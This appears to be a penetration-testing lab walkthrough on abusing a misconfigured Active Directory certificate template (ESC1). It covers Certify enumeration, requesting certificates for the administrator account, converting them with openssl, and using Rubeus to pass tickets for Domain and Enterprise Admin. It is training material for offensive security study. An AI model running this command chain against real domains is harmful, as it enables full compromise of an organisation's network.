🪜Find vulnerable templates w/ AD CS to escalate to DA and EA

We can start by using the Certify tool to check for AD CS in moneycorp ->

C:\AD\Tools\Certify.exe cas

We can list all the templates using the following command. Going through the output we can find some interesting templates:

C:\AD\Tools\Certify.exe find
[snip]
CA Name : mcorp-dc.moneycorp.local\moneycorpMCORP-DC-CA
 Template Name : SmartCardEnrollment-Agent    
 Schema Version : 2
 Validity Period : 10 years
 Renewal Period : 6 weeks
 msPKI-Certificates-Name-Flag : SUBJECT_ALT_REQUIRE_UPN,
SUBJECT_REQUIRE_DIRECTORY_PATH
 mspki-enrollment-flag : AUTO_ENROLLMENT
 Authorized Signatures Required : 0
pkiextendedkeyusage : Certificate Request Agent     
 mspki-certificate-application-policy : Certificate Request Agent
 Permissions
 Enrollment Permissions
 Enrollment Rights : dcorp\Domain Users S-1-5-21-719815819-3726368948-3917688648-513    
[snip]
Template Name : HTTPSCertificates     
 Schema Version : 2
 Validity Period : 1 year
 Renewal Period : 6 weeks 
msPKI-Certificates-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
[snip]

Now that we have the templates that we find interesting, we can try out for Privilege Escalation to DA and EA using ESC1

The template HTTPSCertificates looks interesting. Let's get some more information about it as it allows requestor to supply subject name:

C:\AD\Tools\Certify.exe find /enrolleeSuppliesSubject

what this means is that the HTTPSCertificates template grants enrollment rights to RDPUsers group and allows requestor to supply Subject Name. Recall that student613 is a member of RDPUsers group. This means that we can request certificate for any user as student613.

Now we can try to request a certificate for Domain Admin - Administrator:

C:\AD\Tools\Certify.exe request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:"HTTPSCertificates" /altname:administrator

Now let's Copy all the text between -----BEGIN RSA PRIVATE KEY----- and -----END CERTIFICATE----- and save it to esc1.pem:

notepad C:\AD\Tools\esc1.pem

We need to convert it to PFX to use it. Use openssl binary on the student VM to do that. I will use SecretPass@123 as the export password ->

C:\AD\Tools\openssl\openssl.exe pkcs12 -in C:\AD\Tools\esc1.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out C:\AD\Tools\esc1-DA.pfx

Let's start by encoding "asktgt"

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /user:administrator /certificate:esc1-DA.pfx /password:SecretPass@123 /ptt

Now we can check if we actually have DA privileges:

We can use similar method to escalate to Enterprise Admin privileges. Request a certificate for Enterprise Administrator - Administrator

C:\AD\Tools\Certify.exe request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:"HTTPSCertificates" /altname:moneycorp.local\administrator

Save the certificate to esc1-EA.pem and convert it to PFX. I will use SecretPass@123 as the export password:

C:\AD\Tools\openssl\openssl.exe pkcs12 -in C:\AD\Tools\esc1-EA.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out C:\AD\Tools\esc1-EA.pfx

Encode asktgt and run the follwing command ->

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /user:moneycorp.local\Administrator /dc:mcorp-dc.moneycorp.local /certificate:esc1-EA.pfx /password:SecretPass@123 /ptt

And check for EA privileges ->

winrs -r:mcorp-dc cmd /c  set username

Need to go back on this process later on

Now let's try Privilege Escalation to DA and EA using ESC3

PreviousWith DA privilege, get access to SharedwithDCorp share on the an other DCNextReverse shell on a SQL server by abusing database links

Last updated